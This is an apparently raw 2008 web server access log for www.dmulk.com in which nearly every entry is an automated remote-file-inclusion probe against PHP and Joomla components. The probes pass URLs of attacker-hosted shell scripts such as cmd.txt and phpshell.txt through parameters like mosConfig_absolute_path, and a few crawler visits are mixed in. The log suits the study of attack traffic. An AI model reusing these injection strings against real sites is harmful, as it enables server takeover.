72.9.159.213 - - [14/Feb/2008:09:34:19 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [14/Feb/2008:09:34:19 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.213.194.42 - - [14/Feb/2008:09:34:21 -0800] "GET /logs/access_080121.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [14/Feb/2008:09:34:22 -0800] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [14/Feb/2008:09:34:22 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:09:35:29 -0800] "GET /logs/access_080131.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:09:35:30 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.57.2 - - [14/Feb/2008:09:35:30 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.69.226 - - [14/Feb/2008:09:35:49 -0800] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.69.226 - - [14/Feb/2008:09:35:50 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.69.226 - - [14/Feb/2008:09:35:50 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.173.254.28 - - [14/Feb/2008:09:36:25 -0800] "GET /logs/access.log///////////index.php?name=PNphpBB2&file=viewtopic&t=32713//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.213.194.42 - - [14/Feb/2008:09:36:33 -0800] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.237.64.193 - - [14/Feb/2008:09:36:54 -0800] "GET /logs/access.log///////////index.php?name=PNphpBB2&file=viewtopic&t=32713//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.249.13.202 - - [14/Feb/2008:09:37:54 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.13.202 - - [14/Feb/2008:09:37:55 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.13.202 - - [14/Feb/2008:09:37:55 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [14/Feb/2008:09:38:02 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.223.3 - - [14/Feb/2008:09:39:17 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.3 - - [14/Feb/2008:09:39:18 -0800] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.69.226 - - [14/Feb/2008:09:39:40 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.195.192.40 - - [14/Feb/2008:09:40:33 -0800] "GET /logs/access_080121.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.28.122 - - [14/Feb/2008:09:40:39 -0800] "GET /minamijewelry/html/dream.html HTTP/1.0" 200 18217 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.203.223.3 - - [14/Feb/2008:09:40:51 -0800] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.159.44 - - [14/Feb/2008:09:41:02 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.wvcorrectionalindustries.com/phpdig/admin/temp/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.159.44 - - [14/Feb/2008:09:41:02 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.wvcorrectionalindustries.com/phpdig/admin/temp/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.2.100.138 - - [14/Feb/2008:09:42:02 -0800] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Feb/2008:09:42:03 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Feb/2008:09:42:03 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.196.84 - - [14/Feb/2008:09:43:21 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://buckleymanagement.com/images/img? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.223.3 - - [14/Feb/2008:09:43:33 -0800] "GET /logs/access.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.32.58.103 - - [14/Feb/2008:09:44:05 -0800] "GET /amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.algebramovie.com/images/test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
72.32.58.103 - - [14/Feb/2008:09:44:05 -0800] "GET /logs/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.algebramovie.com/images/test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
64.208.182.30 - - [14/Feb/2008:09:44:08 -0800] "GET /presto/?N=D HTTP/1.0" 200 510 "-" "genieBot genieBot@genieknows.com" "www.dmulk.com"
64.15.159.44 - - [14/Feb/2008:09:45:02 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.wvcorrectionalindustries.com/phpdig/admin/temp/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.209.204 - - [14/Feb/2008:09:46:08 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.204 - - [14/Feb/2008:09:46:09 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
64.62.206.91 - - [14/Feb/2008:09:47:26 -0800] "GET /logs/access.log//modules/class/Table.php?sys_conf[path][real]=http://www.mta.cl/galeria2/galery.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.62.206.91 - - [14/Feb/2008:09:47:26 -0800] "GET //modules/class/Table.php?sys_conf[path][real]=http://www.mta.cl/galeria2/galery.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.62.206.91 - - [14/Feb/2008:09:47:26 -0800] "GET /logs//modules/class/Table.php?sys_conf[path][real]=http://www.mta.cl/galeria2/galery.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.62.206.91 - - [14/Feb/2008:09:47:26 -0800] "GET /logs/access.log//modules/class/Table.php?sys_conf[path][real]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.62.206.91 - - [14/Feb/2008:09:47:26 -0800] "GET //modules/class/Table.php?sys_conf[path][real]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.62.206.91 - - [14/Feb/2008:09:47:26 -0800] "GET /logs//modules/class/Table.php?sys_conf[path][real]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Feb/2008:09:48:00 -0800] "GET /logs/access_080121.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.97.199.252 - - [14/Feb/2008:09:48:40 -0800] "GET /amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.algebramovie.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
195.116.188.138 - - [14/Feb/2008:09:48:42 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://jabujabujabu.angelfire.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.22.134.230 - - [14/Feb/2008:09:49:13 -0800] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.22.134.230 - - [14/Feb/2008:09:49:14 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.22.134.230 - - [14/Feb/2008:09:49:15 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.53.83.254 - - [14/Feb/2008:09:51:40 -0800] "GET //?p=http://webcal.promocall.de//tools/pr.txt??? HTTP/1.1" 200 2962 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
84.53.83.254 - - [14/Feb/2008:09:51:41 -0800] "GET /logs//?p=http://webcal.promocall.de//tools/pr.txt??? HTTP/1.1" 200 34548 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
72.32.58.103 - - [14/Feb/2008:09:52:00 -0800] "GET //plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.algebramovie.com/images/test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
72.32.58.103 - - [14/Feb/2008:09:52:00 -0800] "GET /logs//plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.algebramovie.com/images/test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
74.6.23.232 - - [14/Feb/2008:09:52:09 -0800] "GET /bikes/ HTTP/1.0" 200 2168 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.53.52.66 - - [14/Feb/2008:09:52:39 -0800] "GET /logs/access_071219.log/admin/spaw/spaw_control.class.php?spaw_root=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.52.66 - - [14/Feb/2008:09:52:39 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.52.66 - - [14/Feb/2008:09:52:39 -0800] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.71.13 - - [14/Feb/2008:09:53:15 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.247.71.13 - - [14/Feb/2008:09:53:15 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.247.71.13 - - [14/Feb/2008:09:53:15 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.52.66 - - [14/Feb/2008:09:53:26 -0800] "GET /logs/access_071212.log/admin/spaw/spaw_control.class.php?spaw_root=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.160.188.77 - - [14/Feb/2008:09:55:19 -0800] "GET /logs/access_071224.log/start.php?s=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.160.188.77 - - [14/Feb/2008:09:55:24 -0800] "GET /start.php?s=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.160.188.77 - - [14/Feb/2008:09:55:30 -0800] "GET /logs/start.php?s=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.97.199.252 - - [14/Feb/2008:09:56:01 -0800] "GET //plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.algebramovie.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
209.97.199.252 - - [14/Feb/2008:09:56:01 -0800] "GET /logs//plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.algebramovie.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
74.53.52.66 - - [14/Feb/2008:09:56:40 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.172.140.56 - - [14/Feb/2008:09:57:22 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://naimaa.com/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.22.134.230 - - [14/Feb/2008:09:57:29 -0800] "GET /logs/access_080121.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:09:57:50 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:09:57:50 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:09:57:50 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:09:57:57 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:09:57:57 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:09:57:57 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.122.186 - - [14/Feb/2008:09:58:21 -0800] "GET /logs/access_080201.log//includes/orderSuccess.inc.php?include($glob['rootDir']=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.122.186 - - [14/Feb/2008:09:58:21 -0800] "GET //includes/orderSuccess.inc.php?include($glob['rootDir']=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.122.186 - - [14/Feb/2008:09:58:21 -0800] "GET /logs//includes/orderSuccess.inc.php?include($glob['rootDir']=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.172.140.56 - - [14/Feb/2008:09:58:36 -0800] "GET /logs/access.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://naimaa.com/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.172.140.56 - - [14/Feb/2008:09:58:36 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://naimaa.com/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.172.140.56 - - [14/Feb/2008:09:58:36 -0800] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://naimaa.com/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
63.249.33.227 - - [14/Feb/2008:09:59:10 -0800] "GET /index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.89.232.80 - - [14/Feb/2008:09:59:12 -0800] "GET /logs/access.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://naimaa.com/administrator/templates/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.89.232.80 - - [14/Feb/2008:09:59:12 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://naimaa.com/administrator/templates/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.89.232.80 - - [14/Feb/2008:09:59:13 -0800] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://naimaa.com/administrator/templates/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.196.84 - - [14/Feb/2008:09:59:14 -0800] "GET /logs/access_080129.log/skin/zero_vote/ask_password.php?dir=http://buckleymanagement.com/images/img? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.196.84 - - [14/Feb/2008:09:59:15 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://buckleymanagement.com/images/img? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.172.140.56 - - [14/Feb/2008:09:59:23 -0800] "GET /logs/access.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://naimaa.com/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.172.140.56 - - [14/Feb/2008:09:59:23 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://naimaa.com/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.172.140.56 - - [14/Feb/2008:09:59:24 -0800] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://naimaa.com/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.135.210.75 - - [14/Feb/2008:09:59:35 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://brasirc.t35.com/phpshell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.135.210.75 - - [14/Feb/2008:09:59:36 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://brasirc.t35.com/phpshell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.241.196.84 - - [14/Feb/2008:09:59:42 -0800] "GET /logs/access_080120.log/skin/zero_vote/ask_password.php?dir=http://buckleymanagement.com/images/img? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.63.236.106 - - [14/Feb/2008:10:00:15 -0800] "GET /logs/access_080120.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/.aje/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.63.236.106 - - [14/Feb/2008:10:00:15 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/.aje/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.63.236.106 - - [14/Feb/2008:10:00:16 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/.aje/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:10:00:24 -0800] "GET /logs/access_080108.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:10:00:24 -0800] "GET /logs/access_080108.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.116.188.138 - - [14/Feb/2008:10:00:45 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://jabujabujabu.angelfire.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.116.188.138 - - [14/Feb/2008:10:00:45 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://jabujabujabu.angelfire.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.123.27.136 - - [14/Feb/2008:10:04:16 -0800] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [14/Feb/2008:10:04:17 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [14/Feb/2008:10:04:18 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.25.213.172 - - [14/Feb/2008:10:04:22 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://naimaa.com/administrator/templates/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.210.75 - - [14/Feb/2008:10:05:01 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://brasirc.t35.com/phpshell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.135.210.75 - - [14/Feb/2008:10:05:02 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://brasirc.t35.com/phpshell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.63.236.106 - - [14/Feb/2008:10:05:15 -0800] "GET /logs/access_080131.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/.aje/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.213.194.42 - - [14/Feb/2008:10:05:19 -0800] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [14/Feb/2008:10:05:19 -0800] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
